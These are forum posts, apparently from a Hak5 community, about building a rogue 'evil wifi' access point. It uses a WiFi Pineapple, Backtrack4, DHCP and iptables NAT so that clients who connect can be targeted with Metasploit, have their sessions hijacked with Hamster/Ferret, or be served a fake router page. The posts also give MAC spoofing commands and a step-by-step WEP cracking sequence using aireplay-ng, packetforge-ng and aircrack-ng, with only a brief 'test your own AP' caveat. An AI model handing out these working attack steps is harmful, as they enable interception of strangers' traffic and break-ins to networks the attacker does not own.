easycheese

my site talks you though setting up Backtrack4 and Fon for this very perpous. www.dc425.org/dhcp . though i know on that site it states that you need a crossover cable i am not using on and it works fine for me. This setup will get internet sharing working so those connected to the Fon will be able to browse, and all traffic will come over the wire though your laptop and out your wireless. DHCP is shown on the leeses list. and in my tutorial it shows you how to see when a new lease is added. Also once connected you just point Metasploit on eth0 and you will be able to target those that connect. i hope it helps let me know if you have any other questions. I can also make a quick tutorial on using metasploit with this setup if you want.

" Debricking -- Console access via Serial " That is the first post on the forum under this toppic, that will tell you what you need to know.

The WRT54G V7 has Atheros AR2317 chipset with 2MGs flash memory.

yeah im planing on buying a Fon+, Currently i have the fon 2100

Quoted from the Store: "The WiFi Pineapple comes assembled as a Fon 2100 with soldered on 4 AA battery holder with on/off switch housed inside a plastic pineapple shell. The original Fon case and US power adapter as well as Hak5 and Battle Pineapple stickers are included."

yeah, i agree. Im not sure why it is set to Zero either. It might be how dd-wrt is when its installed, i have only ever played with OpenWRT so im still learning all that is dd-wrt

You get the pineapple, power supply, original Fon case, stickers, battery pack connected to the Fon, instructions on using the fon for the first time

Congrads

I noticed that as well. I too had weak signal until i ajusted it. I believe the stock Fon Antenna is only a 1.5 DB gain antenna

What options are you getting, you said you dont get all the options right?

In backpack: Acer Aspire One DualBoot WinXP/Backtrack4 w/ EDGE/UMTS Modem Work laptop Dell 650 XP Fon with Jasager Nokia 770 Bluetooth GPS Puck USB Bluetooth hub 2 Edge/UMTS Modems cat5 cables Screw Drivers Batterys Linux Pocket guide headphones mouse Pen and paper usb cables microSD to SD converter 1 extra CellPhone

The pictures didnt copy over, but if you check my site you can see them.

This is howi have my setup, im using backtrack and the pineapple. I have the Pineapple connected to my Lappy with cat5, and have backtrack running a DHCP server. This is a first Tech artical i wrote, let me know if im missing something or if you try this setup and have problems. Its located: www.dc425.org/dhcp 1. For this im using DHCP3 as my DHCP server. 2. I also used Darren Kitchens Tutorial on Hak5.org for ICS. 3. I created this so i can use the Setup of "evil wifi" located here. Software needed: 1. Backtrack4 2. Dhcp3 3. A Brain I used Darrens Setup for ICS for windows for my Fon, so i can use it both on windows, and Linux. I did the following setup on the fon. Let’s assume that you have successfully installed Der Jasager as per this tutorial. Once you’ve done this go ahead and log in to Der Jasager’s webif interface using a web browser. In my case it was http://192.168.1.1/webif.html. Click the “Network” tab. Change the drop down box next to “Connection Type” from whatever it is set to, to something like Static IP and then back to DHCP. Do this a couple of times. For some reason, in my webif interface, when I change to DHCP, not all settings are available until I do this. In any case, you’ll want to see these options: Change the IP address to something on the same subnet as your non-Internet Connection Shared NIC (that’s “Atheros”on eniac). I changed the IP in the webif interface to 192.168.0.250. Set the Netmask to the default class C address (255.255.255.0). Save your configuration twice. Once using the “Save Changes” button and then again using the “Apply Changes” button. I saved the changes this way, just to be safe. Now, remove power from the Fonera that’s running Der Jasager. Re-associate the ICS’ed NIC to its original access point. In my case, I re-associated “Alfa” to “WRT54G”. Wait a minute, and reapply power to the La Fonera. Then wait a while for the Fonera to boot and the non-ICS’ed NIC (“Atheros” in my case) to associate to “OpenWrt”. You can now open Der Jasager’s web interface in a browser, by connecting and authenticating to the new IP address you just set up. In my case that would be http://192.168.0.250. Here’s how mine looks. After that, lets setup DHCP server on backtrack DHCP3 How too: I first updated dhcp3 on backtrack4. You dont have to do this, but if you want do: sudo apt-get install dhcp3 Then backed up dhcp.conf and erased the contents of the file. Its located at the following: /etc/dhcp3/dhcp.conf This is what my dhcp.conf file looks like: ddns-updates off; option T150 code 150 = string; deny client-updates; one-lease-per-client false; allow bootp; ddns-update-style none; option domain-name-servers 208.67.222.222, 208.67.220.220; default-lease-time 600; max-lease-time 7200; authoritative; subnet 192.168.0.0 netmask 255.255.255.0 { interface eth0; range 192.168.0.2 192.168.0.254; default-lease-time 600; max-lease-time 7200; option subnet-mask 255.255.255.0; option broadcast-address 192.168.0.255; option routers 192.168.0.2; option domain-name-servers 208.67.222.222, 208.67.220.220; } This i edited /etc/network/interfaces; under auto eth0 this is what i have: auto eth0 iface eth0 inet static address 192.168.0.1 network 192.168.0.1/24 netmask 255.255.255.0 Broadcast 192.168.0.254 Then you must tell the dhcp3-server what adapter to listen to. This is located at /etc/default/dhcp3-server Edit that file and under INTERFACES add eth0. It should look like the following: INTERFACES="eth0" Next i set the ipaddress of eth0: sudo ifconfig eth0 inet 192.168.0.2 Next you have to allow all connections through iptables out throught the world, depending on the adapter that is connected to the internet you will have to change it in the command. But the command that i used i let the connection out through my wireless so i use wlan0. sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE You also need to allow ip forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward Now you need to connect the Fon to your laptop. Once connected, start the DHCP server by entering the following: sudo /etc/init.d/dhcp3-server start Once started, you can check for Dhcp leases with the following cat /var/lib/dhcp3/dhcp-leases Now you can startup Hamster and Ferret, Als you can run an Apachi server, with a fake Router page, or what ever you want.

if your using backtrack you can use the command: 1. ifconfig [interface] down 2. sudo iwconfig [interface] nw ether [MAC Address] 3. ifconfig [interface] up Command 2 will look like something: sudo iwconfig wlan0 nw ether 00:11:22:33:44:55

Yeah like i was saying, my Orinoco AP2000 AP will only let me inject 15 packets a second. Anything more than that it just rejects the traffic from my laptop. I would try and lower the injection rate. Lets say you used fragment attack. Then to replay the packet you forged using packetforge, you use "aireplay-ng -2 -x 150 -r packet [interface] -x lets you say how many packets a second you inject. I would try and lower the number until you find how much you can inject before your AP stops allowing you to inject.

What is the command to start DHCP

This is my airbase-ng script http://www.dc425.org/softap

I dont have first hand exsperiance, but the ones i have used worked well.

Let me know how it goes. The `-x 150` is how many packets you inject every second. I found that most AP's work the best with injecting 150 a second. Now that being said, i have an Orinoco AP2000 that will only let me inject 20 a second before it deaths me and will not let me fake auth.

What Wifi card are you using? Did you try and test the Injection Percetage? `aireplay-ng -9 interface` That should tell you injection is working and a percentage on how well it was able to inject. Also what attack are you running. I have the best luck with Packet Fragmitation i believe thats option 5. I usually setup airodump on the AP airodump-ng -c 11 -bssid 00:11:22:33:44:55 -w /tmp/owned interface then fake ath on the Router aireplay-ng -1 30 -a {MAC of AP} interface then: aireplay-ng -5 -b {MAC of AP} interface after it finds a packet and writes the fragmention to your drive run Packetforge to create a packet to replay back to the AP. packetforge -0 -a {MAC of AP} -h {MAC OF YOUR CARD} -k 255.255.255.255 -l 255.255.255.255 -y {The Fragmintaion File that was created should end with .xor} -w packet `-w is writing the packet to replay back to the AP` then using aireplay again to replay "packet" to the AP. aireplay-ng -2 -x 150 -r packet interface after gathering some IV's run aircrack for some good ol fun aircrack-ng capturefile *remember only test your own AP*